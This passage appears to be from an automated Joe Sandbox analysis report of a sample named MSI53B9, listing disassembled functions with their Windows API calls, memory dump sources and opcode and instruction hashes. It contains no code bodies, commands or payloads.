                                              • Instruction ID: 708dfcaee2da512f09c94db44626926ccb4df6fb98a152268dc8535a8eaac067
                                              • Opcode Fuzzy Hash: 9da74f3dd0469c2c0f592cca11339211b6623126aab14a048aab7c7cb83aa8cb
                                              • Instruction Fuzzy Hash: B5F0B47164521CBBDF117F54DC06DAE7F61FF45710B404124FC1596660DA754E109BC5
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Alloc
                                              • String ID: FlsAlloc
                                              • API String ID: 2773662609-671089009
                                              • Opcode ID: e38dab7453c66bec8f2015f32451147af9d709f668e36e754defd25ae3edd96e
                                              • Instruction ID: 641f4491086d4c6e38b7f8aff714c4f540e2810e364e544aaabf60b56bfc886d
                                              • Opcode Fuzzy Hash: e38dab7453c66bec8f2015f32451147af9d709f668e36e754defd25ae3edd96e
                                              • Instruction Fuzzy Hash: 32E0E574B452187BAB15BF649C0A96EBB94FB46720F440174FD05E6740DE751E00C6CA
                                              APIs
                                              • try_get_function.LIBVCRUNTIME ref: 00891DAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: try_get_function
                                              • String ID: FlsAlloc
                                              • API String ID: 2742660187-671089009
                                              • Opcode ID: 847cac18e61ead5d1028cad3fdee97c598cc7e1809a2b526d1bd1271403d125c
                                              • Instruction ID: b64852a23953162d0ce4a734e20549e2967b8f2bb1ac8ee7a1c6c126800dc326
                                              • Opcode Fuzzy Hash: 847cac18e61ead5d1028cad3fdee97c598cc7e1809a2b526d1bd1271403d125c
                                              • Instruction Fuzzy Hash: F0D02B21B823396AAF0036C4AC0A9DA7F54FB01BF1F080061FF1CE1B82C995140086C2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _memcmp_strlen
                                              • String ID:
                                              • API String ID: 2682527083-0
                                              • Opcode ID: b71ecdd88bce517b7f0656c2b77f13aa3bf308a9d3532200eb935cbb4948c9c2
                                              • Instruction ID: b8a50c571b99611c5082dd33f22f2987b6438d63b5f22563744c3607b4685d03
                                              • Opcode Fuzzy Hash: b71ecdd88bce517b7f0656c2b77f13aa3bf308a9d3532200eb935cbb4948c9c2
                                              • Instruction Fuzzy Hash: AB51D3B2504704ABD720EA64DC89FDBB7ECFB89300F04492EF68DD6146EA71E554C762
                                              APIs
                                                • Part of subcall function 008981EB: GetOEMCP.KERNEL32(00000000,?,?,00898474,?), ref: 00898216
                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008984B9,?,00000000), ref: 0089868C
                                              • GetCPInfo.KERNEL32(00000000,008984B9,?,?,?,008984B9,?,00000000), ref: 0089869F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CodeInfoPageValid
                                              • String ID:
                                              • API String ID: 546120528-0
                                              • Opcode ID: e0597cbf37d85d1e85ae0b0bc0198c747c95f519085818ad574ca00af393d69a
                                              • Instruction ID: 9d3b420311e28744015d7298d523c78bb42a99fedb93601c29e9e3f8b6ecbd13
                                              • Opcode Fuzzy Hash: e0597cbf37d85d1e85ae0b0bc0198c747c95f519085818ad574ca00af393d69a
                                              • Instruction Fuzzy Hash: 4E51227090024AEEDF21AFB5C885ABABBE5FF52314F2C406ED086CB651DA359941CB91
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00871383
                                                • Part of subcall function 00875FB1: __EH_prolog.LIBCMT ref: 00875FB6
                                                • Part of subcall function 0087C413: __EH_prolog.LIBCMT ref: 0087C418
                                                • Part of subcall function 0087C413: new.LIBCMT ref: 0087C45B
                                                • Part of subcall function 0087C413: new.LIBCMT ref: 0087C47F
                                              • new.LIBCMT ref: 008713FB
                                                • Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: ebfc82be96a60e9896af77f771c42496d5c46aca29b3dab0526abb154ee9ea85
                                              • Instruction ID: b5b24abcc5db96e124bf3b9f3521f53cec6c078e51af2448bae344828a025b5e
                                              • Opcode Fuzzy Hash: ebfc82be96a60e9896af77f771c42496d5c46aca29b3dab0526abb154ee9ea85
                                              • Instruction Fuzzy Hash: B94116B0805B409ED724DF7984859E6FBE5FF28300F50896ED5EEC7282CB32A554CB15
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00871383
                                                • Part of subcall function 00875FB1: __EH_prolog.LIBCMT ref: 00875FB6
                                                • Part of subcall function 0087C413: __EH_prolog.LIBCMT ref: 0087C418
                                                • Part of subcall function 0087C413: new.LIBCMT ref: 0087C45B
                                                • Part of subcall function 0087C413: new.LIBCMT ref: 0087C47F
                                              • new.LIBCMT ref: 008713FB
                                                • Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 63445c4a1e158e5fc306531120d1cfdc6728c8287cb1990bcf44b35309402fa3
                                              • Instruction ID: 22fa74d10d65f64aac4edd4b4eef074dade7d23098ffab7602bf20dcbea4a09d
                                              • Opcode Fuzzy Hash: 63445c4a1e158e5fc306531120d1cfdc6728c8287cb1990bcf44b35309402fa3
                                              • Instruction Fuzzy Hash: 784117B0805B409ED724DF798485AE6FBE5FF28300F50896ED5EEC7282CB726554CB16
                                              APIs
                                                • Part of subcall function 0089631F: GetLastError.KERNEL32(?,008ACBE8,00892674,008ACBE8,?,?,00892213,?,?,008ACBE8), ref: 00896323
                                                • Part of subcall function 0089631F: _free.LIBCMT ref: 00896356
                                                • Part of subcall function 0089631F: SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896397
                                                • Part of subcall function 0089631F: _abort.LIBCMT ref: 0089639D
                                                • Part of subcall function 00898576: _abort.LIBCMT ref: 008985A8
                                                • Part of subcall function 00898576: _free.LIBCMT ref: 008985DC
                                                • Part of subcall function 008981EB: GetOEMCP.KERNEL32(00000000,?,?,00898474,?), ref: 00898216
                                              • _free.LIBCMT ref: 008984CF
                                              • _free.LIBCMT ref: 00898505
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free$ErrorLast_abort
                                              • String ID:
                                              • API String ID: 2991157371-0
                                              • Opcode ID: b054bb888ee7d0cf0dd39ae527810503f4394f277f8a89c32fa883ce1b6fb282
                                              • Instruction ID: 0103f73d61112f67b6299efc24f743561099f8d6ba478656a57a7b2d1f063a0e
                                              • Opcode Fuzzy Hash: b054bb888ee7d0cf0dd39ae527810503f4394f277f8a89c32fa883ce1b6fb282
                                              • Instruction Fuzzy Hash: 3E316F3190420AEFDF11FBA8D841A9D7BE4FF42320F294199E804DB691EF359D41CB55
                                              APIs
                                              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00879B87,?,?,00877735), ref: 00879579
                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00879B87,?,?,00877735), ref: 008795AE
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 1bdef6b471f2c0093db29c57392cbf02d2e70bcce566789c7d714823d1fed363
                                              • Instruction ID: f4cb42ecae24f850adada3cb614977015048817ad61e3e02a757cb325b433e4d
                                              • Opcode Fuzzy Hash: 1bdef6b471f2c0093db29c57392cbf02d2e70bcce566789c7d714823d1fed363
                                              • Instruction Fuzzy Hash: DC21E1B1004748AFE7318F18C885BA7B7E8FB49768F00892DF5E9C2595C274ED498B61
                                              APIs
                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00877436,?,?,?), ref: 00879A2C
                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00879ADC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: File$BuffersFlushTime
                                              • String ID:
                                              • API String ID: 1392018926-0
                                              • Opcode ID: 55e5fb5007035a63f98216cced1e4d5bd6538408c1a74faecc7843362542bfe7
                                              • Instruction ID: 4f06cc1205a8f4db755da0d47f25b1a08213574ca9f1b7c294c185b312f5a998
                                              • Opcode Fuzzy Hash: 55e5fb5007035a63f98216cced1e4d5bd6538408c1a74faecc7843362542bfe7
                                              • Instruction Fuzzy Hash: 5121F331149395AFC711DE28C881AAAFBD8FF96704F08891CF8D9C7195DB29ED08C752
                                              APIs
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00897795
                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008977A2
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AddressProc__crt_fast_encode_pointer
                                              • String ID:
                                              • API String ID: 2279764990-0
                                              • Opcode ID: 55746ee8cc19e97c4bba8134b3d41162d69ef472e9d4000a8d79fba2a945edfe
                                              • Instruction ID: 263494e551e521f7925728f4bc579f84b80206630cc37077571801f80875f6ef
                                              • Opcode Fuzzy Hash: 55746ee8cc19e97c4bba8134b3d41162d69ef472e9d4000a8d79fba2a945edfe
                                              • Instruction Fuzzy Hash: 89110637A14621BBEF25AFA8EC809AA7395FB85720B1E0220FD15EB654DB31DC4187D1
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00879B21
                                              • GetLastError.KERNEL32 ref: 00879B2D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: f9546a0e65f14ae8a5bed655e33217ff0ba243ac5f686f1c6d091c16b2bf65ef
                                              • Instruction ID: 4532641b668d39763ffc84c78fa9e7c8b0703b1eb2641e99db1657c4ae5a6753
                                              • Opcode Fuzzy Hash: f9546a0e65f14ae8a5bed655e33217ff0ba243ac5f686f1c6d091c16b2bf65ef
                                              • Instruction Fuzzy Hash: 5B01DE713007146BEB349E28EC84B6AB3D9FB85328F10853EF19AC3684DA31E8088621
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 008798EB
                                              • GetLastError.KERNEL32 ref: 008798F8
                                                • Part of subcall function 008796AA: __EH_prolog.LIBCMT ref: 008796AF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorFileH_prologLastPointer
                                              • String ID:
                                              • API String ID: 4236474358-0
                                              • Opcode ID: 01851d13d912907aeca4f8c39d7fd559d944dc8c52746bacf9a9bfcd59deaf98
                                              • Instruction ID: fbe1ee754cf5232d220b40db6a640b79243e7bbd96f38e21a6ed9da29167e498
                                              • Opcode Fuzzy Hash: 01851d13d912907aeca4f8c39d7fd559d944dc8c52746bacf9a9bfcd59deaf98
                                              • Instruction Fuzzy Hash: 9301D4326046099BDB188E598C44AAB7B59FF57330714C27DF9BECB698D730EC019762
                                              APIs
                                              • _free.LIBCMT ref: 00895B0B
                                                • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                              • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,008ACBE8,008717A1,?,?,?,?,00000000,?,00871378,?,?), ref: 00895B47
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Heap$AllocAllocate_free
                                              • String ID:
                                              • API String ID: 2447670028-0
                                              • Opcode ID: ad214777fb002ff234eb0d71d60a84e45ae1af86c58f3b7e1d496c2fa9682859
                                              • Instruction ID: 1532fe419d9886295e121df6d8a44a5b2c343607bd34c64bb32f74e8840da2fa
                                              • Opcode Fuzzy Hash: ad214777fb002ff234eb0d71d60a84e45ae1af86c58f3b7e1d496c2fa9682859
                                              • Instruction Fuzzy Hash: 7EF04F32701A15A6AF233A29AC01F6A3758FF91771B5C4115F818E61A1DB30880183A2
                                              APIs
                                              • LoadStringW.USER32(?,?,00000200,?), ref: 0087D187
                                              • LoadStringW.USER32(?,?,00000200,?), ref: 0087D19D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: LoadString
                                              • String ID:
                                              • API String ID: 2948472770-0
                                              • Opcode ID: 12f5b91809057631d200d9252083187bbdecf5480d7690ab6b2d8daee46ae9e6
                                              • Instruction ID: b2c19bcb63243b4e5efd8067fb073734205851ea10b589ac25b4258aa65973a6
                                              • Opcode Fuzzy Hash: 12f5b91809057631d200d9252083187bbdecf5480d7690ab6b2d8daee46ae9e6
                                              • Instruction Fuzzy Hash: 22F0C8327112287FFA115F50AC45FA7BE59FF163A0F010825FA88D7961D6128C06D7B0
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?), ref: 0087FCB3
                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 0087FCBA
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Process$AffinityCurrentMask
                                              • String ID:
                                              • API String ID: 1231390398-0
                                              • Opcode ID: 9ceeb939420cb3d4dec4e6f72c935f81a3cde27fbbdd5ec49de9f0070769db33
                                              • Instruction ID: ff749066a2e773c6af256f8250b4877fadebb59f5a10f3bddafefff65b1b4c5b
                                              • Opcode Fuzzy Hash: 9ceeb939420cb3d4dec4e6f72c935f81a3cde27fbbdd5ec49de9f0070769db33
                                              • Instruction Fuzzy Hash: 80E09232E1412E679F1A8AA59C059EF739DFB85300724C17AEE0ED3605FA34DD014BA0
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A0D7
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A108
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 1634c49ba1d15f88d462897d956079be3ed0a4391068b04ccb1e68d025c2b0a0
                                              • Instruction ID: dd552b58baee30f565169180a2821ef1408d7f4d9acd56baf805d211e13c1522
                                              • Opcode Fuzzy Hash: 1634c49ba1d15f88d462897d956079be3ed0a4391068b04ccb1e68d025c2b0a0
                                              • Instruction Fuzzy Hash: F5F0A031280109ABEF116F64EC01BDE776DFF04381F44C061B988C6069DB32DA989B61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ItemText_swprintf
                                              • String ID:
                                              • API String ID: 3011073432-0
                                              • Opcode ID: 7ce322625ce38bb5369d233cc3e58f06e66e0bba348bcb507d11c4ade6493ea9
                                              • Instruction ID: 48762e8a7d88a606bc6500b3d506c5d9787fa900a89a57aa75f6b57b5a29f89b
                                              • Opcode Fuzzy Hash: 7ce322625ce38bb5369d233cc3e58f06e66e0bba348bcb507d11c4ade6493ea9
                                              • Instruction Fuzzy Hash: D3F0EC3255474CB7E711BBA4DC06F993B5DFB04381F044096F605D20A6E6715A209773
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,00879611,?,?,0087946C), ref: 00879DBD
                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00879611,?,?,0087946C), ref: 00879DEB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 748850104a32eb51a393f0ef767d296be6fc0112538c1eb557576d811f62ee0e
                                              • Instruction ID: 8e2c5ab403cf85bee6c4cd45f7836a458a4728ebab96232377ae25741b82aa22
                                              • Opcode Fuzzy Hash: 748850104a32eb51a393f0ef767d296be6fc0112538c1eb557576d811f62ee0e
                                              • Instruction Fuzzy Hash: 3BE0923165120DABEB20AFA5DC41BEA779EFF09381F848061FA88C2054DB31DD949AA0
                                              APIs
